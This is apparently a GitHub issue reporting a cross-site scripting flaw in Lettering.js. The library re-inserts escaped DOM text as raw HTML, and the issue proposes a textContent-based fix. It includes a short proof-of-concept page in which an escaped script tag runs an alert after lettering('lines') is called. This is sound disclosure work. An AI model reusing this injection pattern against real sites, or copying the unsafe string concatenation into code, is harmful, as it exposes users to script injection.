-
Notifications
You must be signed in to change notification settings - Fork 747
Open
Labels
Description
The injector first extracts the DOM text representation, then inserts it into HTML:
Lettering.js/jquery.lettering.js
Line 20 in d06bb73
inject += '<span class="'+klass+(i+1)+'" aria-hidden="true">'+item+'</span>'+after; |
Thus even when the server properly escapes user input, calling lettering on these DOM nodes converts it back to HTML, allowing for cross-site-scripting (XSS).
This is probably only exploitable in the "lines" and "words" methods, because the default method splits into characters, and the
<
in <span><</span>
is parsed as text by browsers.
Solution
Create the <span>
programmatically using document.createElement
and set the content using textContent
.
Exploit
<!doctype html>
<html>
<head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js"></script>
<script src="./jquery.lettering.js"></script>
</head>
<body>
<div id="exploitme"><script>alert("I'm properly escaped HTML");</script></div>
<script>
jQuery('#exploitme').lettering('lines');
</script>
</body>
</html>
A popup showing "I'm properly escaped HTML" will open, thus arbitrary code execution is achieved. Tested in Firefox 75.0 and Chromium 81.0.4044.113.